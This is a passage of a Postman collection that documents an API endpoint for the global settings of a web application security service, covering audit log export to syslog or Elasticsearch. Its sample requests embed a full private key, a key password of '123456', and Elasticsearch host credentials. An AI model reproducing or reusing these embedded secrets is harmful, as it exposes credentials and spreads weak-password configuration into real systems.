CERTIFICATE-----=LF=MIIDsDCCApigAwIBAgIBAjANBgkqhkiG9w0BAQsFADBdMQswCQYDVQQGEwJDTjEQ=LF=MA4GA1UECAwHQmVpamluZzEQMA4GA1UEBwwHQmVpamluZzERMA8GA1UECgwIRm9y=LF=dGluZXQxFzAVBgNVBAMMDjU0LjI1MS4xMzIuMjQ5MB4XDTE5MDYxMjAxNTczNloX=LF=DTIwMDYxMTAxNTczNlowXTELMAkGA1UEBhMCQ04xEDAOBgNVBAgMB0JlaWppbmcx=LF=EDAOBgNVBAcMB0JlaWppbmcxETAPBgNVBAoMCEZvcnRpbmV0MRcwFQYDVQQDDA42=LF=MC4yNDcuMTIxLjIyNjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKSs=LF=AEfobEDA9BR3o1ook2GQQIgGz1sGbq3mp/cWhS6SMv0t5ebpc5DsAys/AKCppzxI=LF=UPBYEidp5BgJu86WLQnWHW0QTN06HYGM0G1GbwX57Bqbm8w2pzCCkqhGiEUIKB8L=LF=NqEhPfPyutM+xjI78miU7e1g2wP6mqaUCEbJBRTqVL0ZBm+/NyKoBNe6jvMKT91V=LF=reCIAJuJKaU50PIRVzsh1LHTiGrk4TqJaoGlzD1uOZEzcu6Hl0NXyRnhnx3ZVYAc=LF=odH7nGIDSPH6YRzZiSLWZgqq6tOkCrZ9Cw4RzlCRpHuYlbXp9LRfSzvDLiw9un+R=LF=C1vauuNhYzXCM4xtWssCAwEAAaN7MHkwCQYDVR0TBAIwADAsBglghkgBhvhCAQ0E=LF=HxYdT3BlblNTTCBHZW5lcmF0ZWQgQ2VydGlmaWNhdGUwHQYDVR0OBBYEFCXHiyMt=LF=QPjcEmEOy0lwxIup4nGgMB8GA1UdIwQYMBaAFHQ5v3UVEfm0wT6ekx4VTUWtZvTx=LF=MA0GCSqGSIb3DQEBCwUAA4IBAQDQ/KfeCDNOjIbim7MvpQd3likrnOEHeL9oJO2k=LF=sCZtSnorB0XGr60b8S4NScHLLed2hzSKaAuVvsvo8TXIktFwdO4AQvcGC9HEDOZF=LF=gDipsPk1/uoQJPVA+CBCyp1NqH5gJKaSvopMN05n59DG58L9NGdZVPq/DpJPHJaJ=LF=jztJaU3i/tJ1vDmFx7khXrSyWSQ0NOJYygpEnvejRCmFgzZlRlCcnCaKkvPYn8b4=LF=pC/8HyXUqOgGPbtKbNu4VNqtBghjrH4AqSjiTeKFMbYhHwstwr2RK4WT+WlfyXZR=LF=dGUMa0u6JTNw7sQDUOIKYpgNncph75xigLEupo9+yllGnnt3=LF=-----END CERTIFICATE-----\",\n    \t\"pkey\": \"-----BEGIN PRIVATE KEY-----=LF=MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQCkrABH6GxAwPQU=LF=d6NaKJNhkECIBs9bBm6t5qf3FoUukjL9LeXm6XOQ7AMrPwCgqac8SFDwWBInaeQY=LF=CbvOli0J1h1tEEzdOh2BjNBtRm8F+ewam5vMNqcwgpKoRohFCCgfCzahIT3z8rrT=LF=PsYyO/JolO3tYNsD+pqmlAhGyQUU6lS9GQZvvzciqATXuo7zCk/dVa3giACbiSml=LF=OdDyEVc7IdSx04hq5OE6iWqBpcw9bjmRM3Luh5dDV8kZ4Z8d2VWAHKHR+5xiA0jx=LF=+mEc2Yki1mYKqurTpAq2fQsOEc5QkaR7mJW16fS0X0s7wy4sPbp/kQtb2rrjYWM1=LF=wjOMbVrLAgMBAAECggEAP9dvRHGXhoNIHadEbW/Ns8V5P0NkoKWdw03pUKIqgCOu=LF=IPnqZ9uaMlVN5TZHyAH+FCD1QDjk0OL8y1T6utz+GRIp1l67bglZ5x/wrmzgHjEG=LF=mEo73LBToTr+IL83lYvUAjUWuOFqY2l3hO6RaGhVUrZqh91FDAXcbzh0/PxyO+j+=LF=GE1xOX2DkN9nZuziaNcLOJm9MKSsJCdRYRHkWOpn47SkFeQyG4wKjV4Mo5842fIt=LF=Va9/q6dAfrt8hE98WgHCyp8MNTzeRc1ps4UjN10caHMRZprJjjJrCmz1Lz9T/dkf=LF=E/fkBvVBWr49nwt2J6FCYQNE0FFQnYt9KO8EgOHCAQKBgQDWRitO1KEPJaPZfvZL=LF=Hr4sDIv5J1S1VRRL6ohiqUIhea159S770J/3gdxEyj653Ox8u1xKJ7X6pglQ2d3g=LF=aj66/kZs2K10wHWXf+RkLv/NzRM4WPy07JpBKpd5YwWX3boiYdGLEEyQHYK5ya8H=LF=eg+cvCc4AE4W7a0RTtHiHnC+XQKBgQDEvRl4V5V7Bvs4LgDJF20ll6uAYxiQ1B/a=LF=a6rth9rPFaP+a09ZqcOP1UjviIhQ/rP2JYJ4dneI4v1EqkqrlVDNUxFNRfMJS/60=LF=qRHj0NRftlT5NCMV5H/cR01kPtS5YPoJtPOdrmNGHu0WobSAdVRiF9R8wJDSj4l9=LF=3hxanpvbRwKBgQCbJ54ua7rf+/JkCBIRnQY5YTBtznQBBcU3n3D4d/Uhxji+SbKm=LF=to9OqmK0EPpQnU9Elmqia5TTFS1DtS57VJNt1bdrE46uLro3ZG0dugaSn/9d2tnJ=LF=rFWaAFxEklY3fF9OjCQuHTRDWosROqAZuuHZLUj8vQPOiHW8RaWmpUIgJQKBgDyQ=LF=dhnM5JB2Cro1tzowgwIymbIxT2uuUYv83ya2Ts63O7/jqw7QKwrJPuW2YziD4ESj=LF=MXICDjROpGcSAWCm27QJoWbnZLT09xkIfyBhti8swyXgPfjMWewm6xU0HmpfBzob=LF=wW9GMvtwI852w0lUVUDJUzmAUlTvqQTdbl8bOqGbAoGALk8Tzg3uZEGfuOrFxr+W=LF=7BfHYcZLWMNU3gtG1wPpVF4JDbyxGAhxJi2VDJOsxXMj/1xiFc7+MjJuGuljDZXx=LF=bQSWaCtkN6lPKlbazrxWkKL3KKjiGS76vaWS1fu2XQudvQs2+Or4J5xN9Afdh5Yh=LF=+HbxPK8+6wv9+Ed2ROaBua0==LF=-----END PRIVATE KEY-----\",\n    \t\"pkey_passwd\": \"123456\",\n    \t\"type\": \"custom\",\n    \t\"value\": \"cs1={{uid}} cs1Label=UserID cs2={{un}} cs2Label=UserName cs3={{an}} cs3Label=AppName cs4={{lv}} cs4Label=Level msg={{bd}} rt={{ts}}\",\n    \t\"facility\": \"local0\",\n    \t\"user_id\": \"bba91d22-ca28-11e9-b785-2e109146634c\",\n    \t\"server_type\": \"syslog\",\n    \t\"syslog_type\": \"elog\"\n    },\n    \"ESServer\": {\n    \t\"address\": \"f459405714614c5a8624bdc20f1180b1.ap-southeast-1.aws.found.io\",\n    \t\"port\":\"9243\",\n    \t\"username\":\"elastic\",\n    \t\"password\":\"123456\",\n    \t\"server_type\":\"elasticsearch\",\n    \t\"syslog_type\":\"elog\",\n    \t\"user_id\":\"bba91d22-ca28-11e9-b785-2e109146634c\"\n    }\n}\n","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/global-setting","description":"<p>Modify the global setting.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"required\": [\"AuditEnable\", \"WeeklyEnable\", \"WeekReport\", \"AuditLog\", \"ServerType\"],\n    \"properties\": {\n        \"AuditEnable\": {\n            \"description\": \"Select 0 to disable exporting audit logs, or select 1 to enable exporting audit logs\",\n            \"type\": \"int\",\n            \"enum\": [0,1],\n            \"default\": 0\n        },\n        \"WeeklyEnable\": {\n            \"description\": \"Select 0 to disable sending weekly report or select 1 to enable sending weekly report\",\n            \"type\": \"int\",\n            \"enum\": [0,1],\n            \"default\": 0\n        },\n        \"WeekReport\": {\n            \"description\": \"Configure weekly report configuration\",\n            \"type\": \"object\",\n            \"properties\": {\n                \"email\":{\n                    \"description\": \"Configure the email address that receives the weekly report\",\n                    \"type\": \"string\"\n                },\n                \"email_default\":{\n                    \"description\": \"Select 0 to define the email address that receives the weekly report or 1 to send the weekly report to the default email address\",\n                    \"type\": \"int\",\n                    \"enum\": [0,1]\n                }\n            }\n        },\n        \"AdvancedConfiguration\": {\n            \"description\": \"Enable/Disable the advanced configurations.\",\n            \"type\": \"string\",\n            \"enum\": [\"disable\", \"enable\"],\n            \"default\": \"disable\"\n        },\n        \"ServerType\": {\n            \"description\": \"The type of the AuditLog server.\",\n            \"type\": \"string\",\n            \"enum\": [\"syslog\", \"elasticsearch\"],\n            \"default\": \"syslog\"\n        },\n        \"AuditLog\": {\n            \"description\": \"Configure syslog server for auditing log\",\n            \"type\": \"object\",\n            \"required\": [\"server_type\", \"syslog_type\", \"address\", \"port\", \"protocol\", \"cert_signed\", \"type\", \"value\"],\n            \"properties\":{\n                \"server_type\": {\n                    \"description\": \"The type of the server, should be 'syslog' here.\",\n                    \"type\": \"string\",\n                    \"enum\": [\"syslog\", \"elasticsearch\"]\n                },\n                \"syslog_type\": {\n                    \"description\": \"The type of the log content, should be 'elog' here.\",\n                    \"type\": \"string\",\n                    \"enum\": [\"alog\", \"elog\"]\n                },\n                \"address\": {\n                    \"description\": \"Configure the syslog server address or domain\",\n                    \"type\": \"string\"\n                },\n                \"port\": {\n                    \"description\": \"Configure the syslog server listened port.\",\n                    \"type\": \"int\"\n                },\n                \"protocol\": {\n                    \"description\": \"Select the protocol that connects to syslog server.\",\n                    \"type\": \"string\",\n                    \"enum\": [\"TCP\",\"UDP\",\"SSL\"],\n                    \"default\": \"UDP\"\n                },\n                \"cert_signed\": {\n                    \"description\": \"Use customer cert (0) or default self-signed cert (1)\",\n                    \"type\": \"string\",\n                    \"enum\": [0, 1],\n                    \"default\": \"1\"\n                },\n                \"pkey\": {\n                    \"description\": \"Private key of cert\",\n                    \"type\": \"string\"\n                },\n                \"pkey_passwd\": {\n                    \"description\": \"Enter the password of private key\",\n                    \"type\": \"string\"\n                },\n                \"type\": {\n                    \"description\": \" The type of the log template\",\n                    \"type\": \"string\",\n                    \"enum\": [\"default\", \"splunk\", \"cef0_arcsight\", \"azure_oms\", \"leef1_qradar\", \"custom\"],\n                    \"default\": \"default\"\n                },\n                \"value\": {\n                    \"description\": \"The template content of corresponding type\",\n                    \"type\": \"string\"\n                },\n                \"facility\": {\n                    \"description\": \"The Syslog facility value\",\n                    \"type\": \"string\",\n                    \"enum\": [\"local0\", \"local1\",\"local2\", \"local3\",\"local4\", \"local5\",\"local6\", \"local7\"],\n                    \"default\": \"local0\"\n                }\n            }\n        },\n        \"ESServer\": {\n            \"description\": \"Configure elaseticsearch server for auditing log\",\n            \"type\": \"object\",\n            \"required\": [\"server_type\", \"syslog_type\", \"address\", \"port\", \"username\", \"password\"],\n            \"properties\":{\n                \"server_type\": {\n                    \"description\": \"The type of the server, should be 'elasticsearch' here.\",\n                    \"type\": \"string\",\n                    \"enum\": [\"syslog\", \"elasticsearch\"]\n                },\n                \"syslog_type\": {\n                    \"description\": \"The type of the log content, should be 'elog' here.\",\n                    \"type\": \"string\",\n                    \"enum\": [\"alog\", \"elog\"]\n                },\n                \"address\": {\n                    \"description\": \"Configure the elasticsearch address or domain\",\n                    \"type\": \"string\"\n                },\n                \"port\": {\n                    \"description\": \"Configure the elasticsearch server listened port.\",\n                    \"type\": \"int\"\n                },\n                \"username\": {\n                    \"description\": \"The username of the elasticsearch server.\",\n                    \"type\": \"string\"\n                },\n                \"password\": {\n                    \"description\": \"The password of the elasticsearch server\",\n                    \"type\": \"string\"\n                }\n            }\n        }\n    }\n}\n\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","global-setting"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"83b74ab7-e298-4b8c-a336-f948b4e9968f","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"AuditEnable\": 1,\n    \"WeeklyEnable\": 1,\n    \"ServerType\": \"elasticsearch\",\n    \"WeekReport\": {\n\t\t\"email\": \"fsun@example.com\",\n\t\t\"email_default\": 0\n    },\n\t\"AdvancedConfiguration\": \"disable\",\n    \"AuditLog\": {\n    \t\"address\": \"18.139.115.210\",\n    \t\"port\": \"30514\",\n    \t\"protocol\": \"SSL\",\n    \t\"cert_signed\": 0,\n    \t\"cert\": \"Certificate:=LF=    Data:=LF=        Version: 3 (0x2)=LF=        Serial Number: 2 (0x2)=LF=    Signature Algorithm: sha256WithRSAEncryption=LF=        Issuer: C=CN, ST=Beijing, L=Beijing, O=tim, CN=54.251.132.249=LF=        Validity=LF=            Not Before: Jun 12 01:57:36 2019 GMT=LF=            Not After : Jun 11 01:57:36 2020 GMT=LF=        Subject: C=CN, ST=Beijing, L=Beijing, O=tim, CN=60.247.121.226=LF=        Subject Public Key Info:=LF=            Public Key Algorithm: rsaEncryption=LF=                Public-Key: (2048 bit)=LF=                Modulus:=LF=                    00:a4:ac:00:47:e8:6c:40:c0:f4:14:77:a3:5a:28:=LF=                    93:61:90:40:88:06:cf:5b:06:6e:ad:e6:a7:f7:16:=LF=                    85:2e:92:32:fd:2d:e5:e6:e9:73:90:ec:03:2b:3f:=LF=                    00:a0:a9:a7:3c:48:50:f0:58:12:27:69:e4:18:09:=LF=                    bb:ce:96:2d:09:d6:1d:6d:10:4c:dd:3a:1d:81:8c:=LF=                    d0:6d:46:6f:05:f9:ec:1a:9b:9b:cc:36:a7:30:82:=LF=                    92:a8:46:88:45:08:28:1f:0b:36:a1:21:3d:f3:f2:=LF=                    ba:d3:3e:c6:32:3b:f2:68:94:ed:ed:60:db:03:fa:=LF=                    9a:a6:94:08:46:c9:05:14:ea:54:bd:19:06:6f:bf:=LF=                    37:22:a8:04:d7:ba:8e:f3:0a:4f:dd:55:ad:e0:88:=LF=                    00:9b:89:29:a5:39:d0:f2:11:57:3b:21:d4:b1:d3:=LF=                    88:6a:e4:e1:3a:89:6a:81:a5:cc:3d:6e:39:91:33:=LF=                    72:ee:87:97:43:57:c9:19:e1:9f:1d:d9:55:80:1c:=LF=                    a1:d1:fb:9c:62:03:48:f1:fa:61:1c:d9:89:22:d6:=LF=                    66:0a:aa:ea:d3:a4:0a:b6:7d:0b:0e:11:ce:50:91:=LF=                    a4:7b:98:95:b5:e9:f4:b4:5f:4b:3b:c3:2e:2c:3d:=LF=                    ba:7f:91:0b:5b:da:ba:e3:61:63:35:c2:33:8c:6d:=LF=                    5a:cb=LF=                Exponent: 65537 (0x10001)=LF=        X509v3 extensions:=LF=            X509v3 Basic Constraints: =LF=                CA:FALSE=LF=            Netscape Comment: =LF=                OpenSSL Generated Certificate=LF=            X509v3 Subject Key Identifier: =LF=                25:C7:8B:23:2D:40:F8:DC:12:61:0E:CB:49:70:C4:8B:A9:E2:71:A0=LF=            X509v3 Authority Key Identifier: =LF=                keyid:74:39:BF:75:15:11:F9:B4:C1:3E:9E:93:1E:15:4D:45:AD:66:F4:F1=LF==LF=    Signature Algorithm: sha256WithRSAEncryption=LF=         d0:fc:a7:de:08:33:4e:8c:86:e2:9b:b3:2f:a5:07:77:96:29:=LF=         2b:9c:e1:07:78:bf:68:24:ed:a4:b0:26:6d:4a:7a:2b:07:45:=LF=         c6:af:ad:1b:f1:2e:0d:49:c1:cb:2d:e7:76:87:34:8a:68:0b:=LF=         95:be:cb:e8:f1:35:c8:92:d1:70:74:ee:00:42:f7:06:0b:d1:=LF=         c4:0c:e6:45:80:38:a9:b0:f9:35:fe:ea:10:24:f5:40:f8:20:=LF=         42:ca:9d:4d:a8:7e:60:24:a6:92:be:8a:4c:37:4e:67:e7:d0:=LF=         c6:e7:c2:fd:34:67:59:54:fa:bf:0e:92:4f:1c:96:89:8f:3b:=LF=         49:69:4d:e2:fe:d2:75:bc:39:85:c7:b9:21:5e:b4:b2:59:24:=LF=         34:34:e2:58:ca:0a:44:9e:f7:a3:44:29:85:83:36:65:46:50:=LF=         9c:9c:26:8a:92:f3:d8:9f:c6:f8:a4:2f:fc:1f:25:d4:a8:e8:=LF=         06:3d:bb:4a:6c:db:b8:54:da:ad:06:08:63:ac:7e:00:a9:28:=LF=         e2:4d:e2:85:31:b6:21:1f:0b:2d:c2:bd:91:2b:85:93:f9:69:=LF=         5f:c9:76:51:74:65:0c:6b:4b:ba:25:33:70:ee:c4:03:50:e2:=LF=         0a:62:98:0d:9d:ca:61:ef:9c:62:80:b1:2e:a6:8f:7e:ca:59:=LF=         46:9e:7b:77=LF=-----BEGIN CERTIFICATE-----=LF=MIIDsDCCApigAwIBAgIBAjANBgkqhkiG9w0BAQsFADBdMQswCQYDVQQGEwJDTjEQ=LF=MA4GA1UECAwHQmVpamluZzEQMA4GA1UEBwwHQmVpamluZzERMA8GA1UECgwIRm9y=LF=dGluZXQxFzAVBgNVBAMMDjU0LjI1MS4xMzIuMjQ5MB4XDTE5MDYxMjAxNTczNloX=LF=DTIwMDYxMTAxNTczNlowXTELMAkGA1UEBhMCQ04xEDAOBgNVBAgMB0JlaWppbmcx=LF=EDAOBgNVBAcMB0JlaWppbmcxETAPBgNVBAoMCEZvcnRpbmV0MRcwFQYDVQQDDA42=LF=MC4yNDcuMTIxLjIyNjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKSs=LF=AEfobEDA9BR3o1ook2GQQIgGz1sGbq3mp/cWhS6SMv0t5ebpc5DsAys/AKCppzxI=LF=UPBYEidp5BgJu86WLQnWHW0QTN06HYGM0G1GbwX57Bqbm8w2pzCCkqhGiEUIKB8L=LF=NqEhPfPyutM+xjI78miU7e1g2wP6mqaUCEbJBRTqVL0ZBm+/NyKoBNe6jvMKT91V=LF=reCIAJuJKaU50PIRVzsh1LHTiGrk4TqJaoGlzD1uOZEzcu6Hl0NXyRnhnx3ZVYAc=LF=odH7nGIDSPH6YRzZiSLWZgqq6tOkCrZ9Cw4RzlCRpHuYlbXp9LRfSzvDLiw9un+R=LF=C1vauuNhYzXCM4xtWssCAwEAAaN7MHkwCQYDVR0TBAIwADAsBglghkgBhvhCAQ0E=LF=HxYdT3BlblNTTCBHZW5lcmF0ZWQgQ2VydGlmaWNhdGUwHQYDVR0OBBYEFCXHiyMt=LF=QPjcEmEOy0lwxIup4nGgMB8GA1UdIwQYMBaAFHQ5v3UVEfm0wT6ekx4VTUWtZvTx=LF=MA0GCSqGSIb3DQEBCwUAA4IBAQDQ/KfeCDNOjIbim7MvpQd3likrnOEHeL9oJO2k=LF=sCZtSnorB0XGr60b8S4NScHLLed2hzSKaAuVvsvo8TXIktFwdO4AQvcGC9HEDOZF=LF=gDipsPk1/uoQJPVA+CBCyp1NqH5gJKaSvopMN05n59DG58L9NGdZVPq/DpJPHJaJ=LF=jztJaU3i/tJ1vDmFx7khXrSyWSQ0NOJYygpEnvejRCmFgzZlRlCcnCaKkvPYn8b4=LF=pC/8HyXUqOgGPbtKbNu4VNqtBghjrH4AqSjiTeKFMbYhHwstwr2RK4WT+WlfyXZR=LF=dGUMa0u6JTNw7sQDUOIKYpgNncph75xigLEupo9+yllGnnt3=LF=-----END CERTIFICATE-----\",\n    \t\"pkey\": \"-----BEGIN PRIVATE KEY-----=LF=MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQCkrABH6GxAwPQU=LF=d6NaKJNhkECIBs9bBm6t5qf3FoUukjL9LeXm6XOQ7AMrPwCgqac8SFDwWBInaeQY=LF=CbvOli0J1h1tEEzdOh2BjNBtRm8F+ewam5vMNqcwgpKoRohFCCgfCzahIT3z8rrT=LF=PsYyO/JolO3tYNsD+pqmlAhGyQUU6lS9GQZvvzciqATXuo7zCk/dVa3giACbiSml=LF=OdDyEVc7IdSx04hq5OE6iWqBpcw9bjmRM3Luh5dDV8kZ4Z8d2VWAHKHR+5xiA0jx=LF=+mEc2Yki1mYKqurTpAq2fQsOEc5QkaR7mJW16fS0X0s7wy4sPbp/kQtb2rrjYWM1=LF=wjOMbVrLAgMBAAECggEAP9dvRHGXhoNIHadEbW/Ns8V5P0NkoKWdw03pUKIqgCOu=LF=IPnqZ9uaMlVN5TZHyAH+FCD1QDjk0OL8y1T6utz+GRIp1l67bglZ5x/wrmzgHjEG=LF=mEo73LBToTr+IL83lYvUAjUWuOFqY2l3hO6RaGhVUrZqh91FDAXcbzh0/PxyO+j+=LF=GE1xOX2DkN9nZuziaNcLOJm9MKSsJCdRYRHkWOpn47SkFeQyG4wKjV4Mo5842fIt=LF=Va9/q6dAfrt8hE98WgHCyp8MNTzeRc1ps4UjN10caHMRZprJjjJrCmz1Lz9T/dkf=LF=E/fkBvVBWr49nwt2J6FCYQNE0FFQnYt9KO8EgOHCAQKBgQDWRitO1KEPJaPZfvZL=LF=Hr4sDIv5J1S1VRRL6ohiqUIhea159S770J/3gdxEyj653Ox8u1xKJ7X6pglQ2d3g=LF=aj66/kZs2K10wHWXf+RkLv/NzRM4WPy07JpBKpd5YwWX3boiYdGLEEyQHYK5ya8H=LF=eg+cvCc4AE4W7a0RTtHiHnC+XQKBgQDEvRl4V5V7Bvs4LgDJF20ll6uAYxiQ1B/a=LF=a6rth9rPFaP+a09ZqcOP1UjviIhQ/rP2JYJ4dneI4v1EqkqrlVDNUxFNRfMJS/60=LF=qRHj0NRftlT5NCMV5H/cR01kPtS5YPoJtPOdrmNGHu0WobSAdVRiF9R8wJDSj4l9=LF=3hxanpvbRwKBgQCbJ54ua7rf+/JkCBIRnQY5YTBtznQBBcU3n3D4d/Uhxji+SbKm=LF=to9OqmK0EPpQnU9Elmqia5TTFS1DtS57VJNt1bdrE46uLro3ZG0dugaSn/9d2tnJ=LF=rFWaAFxEklY3fF9OjCQuHTRDWosROqAZuuHZLUj8vQPOiHW8RaWmpUIgJQKBgDyQ=LF=dhnM5JB2Cro1tzowgwIymbIxT2uuUYv83ya2Ts63O7/jqw7QKwrJPuW2YziD4ESj=LF=MXICDjROpGcSAWCm27QJoWbnZLT09xkIfyBhti8swyXgPfjMWewm6xU0HmpfBzob=LF=wW9GMvtwI852w0lUVUDJUzmAUlTvqQTdbl8bOqGbAoGALk8Tzg3uZEGfuOrFxr+W=LF=7BfHYcZLWMNU3gtG1wPpVF4JDbyxGAhxJi2VDJOsxXMj/1xiFc7+MjJuGuljDZXx=LF=bQSWaCtkN6lPKlbazrxWkKL3KKjiGS76vaWS1fu2XQudvQs2+Or4J5xN9Afdh5Yh=LF=+HbxPK8+6wv9+Ed2ROaBua0==LF=-----END PRIVATE KEY-----\",\n    \t\"pkey_passwd\": \"123456\",\n    \t\"type\": \"custom\",\n    \t\"value\": \"cs1={{uid}} cs1Label=UserID cs2={{un}} cs2Label=UserName cs3={{an}} cs3Label=AppName cs4={{lv}} cs4Label=Level msg={{bd}} rt={{ts}}\",\n    \t\"facility\": \"local0\",\n    \t\"user_id\": \"bba91d22-ca28-11e9-b785-2e109146634c\",\n    \t\"server_type\": \"syslog\",\n    \t\"syslog_type\": \"elog\"\n    },\n    \"ESServer\": {\n    \t\"address\": \"f459405714614c5a8624bdc20f1180b1.ap-southeast-1.aws.found.io\",\n    \t\"port\":\"9243\",\n    \t\"username\":\"elastic\",\n    \t\"password\":\"123456\",\n    \t\"server_type\":\"elasticsearch\",\n    \t\"syslog_type\":\"elog\",\n    \t\"user_id\":\"bba91d22-ca28-11e9-b785-2e109146634c\"\n    }\n}\n","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/global-setting"},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Global setting change success.\"\n}"}],"_postman_id":"d9108214-07d7-4731-ab66-94ad7b867bca"}],"id":"976b5ae2-b4a5-4fe5-a6e7-3b8e2f52f5c7","description":"<p>Global settings includes weekly report and audit log server configuration.</p>\n","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"fe0dadf1-b7cd-4efe-b637-2363cebcbb7d"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"4a7932a9-461a-4446-861a-e55afa474d75"}}],"_postman_id":"976b5ae2-b4a5-4fe5-a6e7-3b8e2f52f5c7"}],"id":"84834cdf-1064-4486-b31d-a074033698b5","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"d2a60512-a36b-4ea1-b7be-c7bd538f318a"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"e10ff816-572a-4ace-a618-6896e3f9ad6b"}}],"_postman_id":"84834cdf-1064-4486-b31d-a074033698b5","description":""}],"event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"09a3d838-85d5-42d6-b264-dd46ef969868"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"87038d64-04c0-400b-bdf3-dafdc3eef539"}}]}